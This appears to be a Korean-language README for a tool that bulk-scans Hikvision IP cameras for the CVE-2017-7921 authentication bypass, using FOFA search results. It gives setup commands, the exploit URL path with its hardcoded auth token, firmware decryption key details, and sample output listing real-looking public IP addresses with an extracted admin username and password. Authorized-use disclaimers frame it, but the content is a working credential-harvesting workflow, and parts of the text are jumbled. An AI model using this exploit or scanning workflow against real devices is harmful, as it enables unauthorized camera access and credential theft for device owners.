
FOFA를 사용하여 하이크비전(Hikvision)의 CVE-2017-7921 취약점을 신속하게 테스트하고, 로그인 계정과 비밀번호를 제공하며, json 파일을 출력합니다.
보안 고지: 본 도구는 승인된 보안 연구 및 취약점 검증 전용으로만 사용하십시오.
중요 알림: 본 도구를 사용하면 다음 조건에 동의하는 것으로 간주됩니다.
본 프로젝트는 GitHub 보안 연구 정책 및 Hikvision 보안 대응 센터의 공개 규정을 따릅니다.
Hikvision IP 카메라 CVE-2017-7921 인증 우회 취약점에 대한 대량 탐지 및 검증 도구로, 구성 파일의 자동 복호화와 자격 증명 추출을 지원합니다.
git clone https://github.com/[你的用户名]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
도구 디렉터리에 zc/ 폴더를 만들고 장치 목록을 JSON 형식으로 넣으십시오 (줄마다 하나의 장치 객체):
mkdir zc
파일 예시: devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
필드 설명:
python batch_decrypt.py
════════════════════════════════════════════════════════════════════════════════
하이크비전 카메라 구성 파일 취약점 대량 스캔 도구
════════════════════════════════════════════════════════════════════════════════
사용 가능한 JSON 파일:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 바이트)
════════════════════════════════════════════════════════════════════════════════
파일 번호를 선택하세요: 1
선택한 파일: devices_2025.json
장치 데이터를 불러오는 중...
스캔할 총 장치 수: 2000
동시 스레드 수를 입력하세요 (기본값: 5): 10
동시 스레드 수: 10
스캔 시작...
스캔된 총 장치 수: 2000
취약한 장치 발견 수: 127
취약한 장치는 다음 파일에 저장되었습니다: vulnerable_devices.json
스캔이 완료되면 vulnerable_devices.json이 생성되며, 취약한 장치의 모든 정보가 포함됩니다.
예시 출력:
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
/System/configurationFile?auth=YWRtaW46MTEK은 하드코딩된 자격 증명을 사용합니다.279977f62f6cfd2d91cd75b889ce0c9a가 펌웨어에 하드코딩되어 있습니다.0x73, 0x8B, 0x55, 0x44)본 소프트웨어는 승인된 보안 연구 및 교육 목적으로만 제공됩니다. 사용자는 모든 적용 법률을 준수해야 합니다.
최종 업데이트: 2025-01-29 | 버전: v1.0.0 | 지원 CVE: CVE-2017-7921
| 필드 | 설명 | 필수 |
|---|
link | 장치 HTTP/HTTPS 접근 주소 | ✅ 예 |
city | 도시 정보 | ❌ 아니요 |
country | 국가 코드 | ❌ 아니요 |
org | 조직/ISP 정보 | ❌ 아니요 |